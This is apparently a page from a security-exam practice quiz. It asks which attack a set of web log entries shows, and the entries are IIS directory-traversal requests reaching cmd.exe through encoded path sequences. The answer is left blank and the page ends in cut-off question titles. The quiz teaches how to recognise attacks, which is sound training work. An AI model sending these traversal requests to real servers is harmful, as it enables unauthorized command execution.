Multiple Choice
You notice the following in your log files. What attack is being attempted?
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
A) XSS
B) directory traversal
C) showcode.asp
D) Nimda
Correct Answer:

Verified
Correct Answer:
Verified
Q2: ARP spoofing can be used to perform
Q3: You have a website that is not
Q4: Which of the following tools are web
Q5: Janet is reading about the "Pass-the-Hash" technique
Q6: How many possible values can be generated
Q7: Jacob finds the following packet dump in
Q8: Keith is setting up a Wifi network
Q9: Baxter has been told he must install
Q10: When testing a website you enter the
Q11: When evaluating possible NIDS, you are concerned